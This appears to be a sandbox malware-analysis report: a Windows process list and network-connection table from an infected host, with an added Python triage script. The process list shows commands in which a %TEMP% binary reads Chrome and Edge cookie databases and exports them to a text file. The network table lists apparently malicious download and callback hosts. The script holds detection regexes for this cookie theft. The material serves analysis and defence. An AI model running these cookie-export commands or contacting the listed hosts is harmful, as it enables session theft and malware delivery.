"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x198,0x1f0,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\5B5B.exe
C:\Users\Admin\AppData\Local\Temp\5B5B.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1340 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
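The process list above is the raw material for triage rules. The Python below is an added example, not part of this report or of any of the tools named in it: it parses the path/command-line pairs in the format used above and flags the behaviours that stand out in this run: the double-extension payload unpacked from a 7-Zip SFX directory, a binary in %TEMP% opening Chromium Cookies databases (/CookiesFile) and writing them out as text (/scookiestxt), RegSvcs.exe started with no arguments, Edge launched on external URLs by the installer chain, PowerShell running a script dropped in %TEMP%, and bundled installers run silently. The rule names and the reading of an argument-less RegSvcs.exe as an injection-host heuristic are this example's assumptions, and the sample is a constructed, shortened excerpt in the page's format.

```python
import re
from collections import Counter

# Constructed excerpt in the shape of the process list above: a path line followed
# by that process's command line. Shortened; not the full list from the report.
SAMPLE_PROCESS_LIST = r"""
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_B4C2.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1' -retry_count 10"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028 --lang=en-US --renderer-client-id=17 /prefetch:1
"""

# Rule names are this example's own; each regex runs against the command line.
RULES = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in [
    # payload unpacked by a 7-Zip SFX stub, with a double extension ending in .com
    ("sfx_dropped_double_extension", r'\\7ZipSfx\.\d+\\[^\\\s]+\.exe\.com\b'),
    # a non-browser binary in %TEMP% opening a Chromium profile's Cookies database
    ("browser_cookie_db_read",
     r'\\AppData\\Local\\Temp\\\S+\.exe .*?/CookiesFile ".*?\\User Data\\[^"]*\\Cookies"'),
    # cookies written out as a text file in %TEMP% (staging for exfiltration)
    ("cookie_export_to_temp", r'/scookiestxt \S*\\AppData\\Local\\Temp\\'),
    # heuristic: RegSvcs.exe does nothing useful without arguments, so an
    # argument-less launch is a classic idle host for injected code
    ("regsvcs_no_arguments",
     r'^"?C:\\Windows\\Microsoft\.NET\\Framework(?:64)?\\v[\d.]+\\RegSvcs\.exe"?\s*$'),
    # browser pushed to an external URL by the chain rather than by the user
    ("edge_opened_external_url", r'msedge\.exe" --single-argument https?://'),
    # PowerShell executing a script that was dropped in %TEMP%
    ("powershell_script_from_temp",
     r'powershell\.exe".*-Command "C:\\Users\\[^"]*\\AppData\\Local\\Temp\\[^"]*\.ps1'),
    # bundled installers run without any UI
    ("silent_install", r'(?:^|\s)[-/]silent(?:=1)?\b'),
]]


def parse_process_list(text):
    """Pair each process path line with the command line that follows it."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("expected path/command-line pairs")
    return list(zip(lines[0::2], lines[1::2]))


def triage(processes):
    """Return sorted (rule, command line) findings; identical re-launches collapse."""
    findings = set()
    for _path, cmdline in processes:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                findings.add((name, cmdline))
    return sorted(findings)


def rule_counts(processes):
    """Number of distinct command lines each rule fired on."""
    return Counter(name for name, _ in triage(processes))


if __name__ == "__main__":
    for name, cmdline in triage(parse_process_list(SAMPLE_PROCESS_LIST)):
        print(f"{name:32} {cmdline[:90]}")
```

The set in triage() matters on the full list: the same 11111.exe and Esplorarne.exe.com invocations recur dozens of times, and collapsing them leaves a handful of distinct findings to read instead of hundreds of lines.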
Network
| Country | Destination | Domain | Proto |
| N/A | 51.124.78.146:443 | | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.126.31.135:443 | | tcp |
| N/A | 52.247.37.26:80 | | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 104.21.5.208:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | | tcp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 8.8.8.8:53 | fsstoragecloudservice.com | udp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.64.107:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 52.219.64.107:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 186.2.171.3:80 | 186.2.171.3 | tcp |
| N/A | 52.219.64.38:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.64.38:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
